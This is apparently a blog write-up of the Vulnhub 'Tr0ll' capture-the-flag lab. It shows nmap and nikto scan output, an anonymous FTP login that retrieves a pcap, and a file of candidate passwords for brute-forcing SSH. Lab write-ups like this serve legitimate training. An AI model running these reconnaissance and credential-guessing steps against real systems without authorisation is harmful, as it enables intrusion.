Ready to Start Your Career?

By: aisherwood
April 18, 2018
Capture the Flag - Start Tr0lling

By: aisherwood
April 18, 2018
Overview
Objective: Get Flag
Tools used: netdiscover, nmap, nikto, wireshark, hydra, scp, a brain
To start, we'll get the IP of the tr0ll VM. I usually just use netdiscover as follows:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-10 13:13 EDTNmap scan report for 192.168.56.11Host is up (0.00011s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.222/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))MAC Address: 08:00:27:BD:08:3E (Oracle VirtualBox virtual NIC)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

nikto -h 192.168.56.11
- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.11+ Target Hostname: 192.168.56.11+ Target Port: 80+ Start Time: 2017-06-10 13:19:32 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.7 (Ubuntu)+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded + The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ "robots.txt" contains 1 entry which should be manually viewed.+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3092: /secret/: This might be interesting...+ OSVDB-3233: /icons/README: Apache default file found.+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host+ End Time: 2017-06-10 13:19:48 (GMT-4) (16 seconds)---------------------------------------------------------------------------+ 1 host(s) tested

Connected to 192.168.56.11.220 (vsFTPd 3.0.2)Name (192.168.56.11:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap226 Directory send OK.ftp> get lol.pcaplocal: lol.pcap remote: lol.pcap200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for lol.pcap (8068 bytes).226 Transfer complete.8068 bytes received in 0.00 secs (7.7097 MB/s)ftp>




root@kali:~/Documents/Vulnhub/tr0ll# cat Pass.txt Good_job_:)root@kali:~/Documents/Vulnhub/tr0ll# cat which_one_lol.txt maleusps-auxfeluxEagle11genphlux < -- Definitely not this oneusmc8892blawrgwytshadowvis1t0roverflow



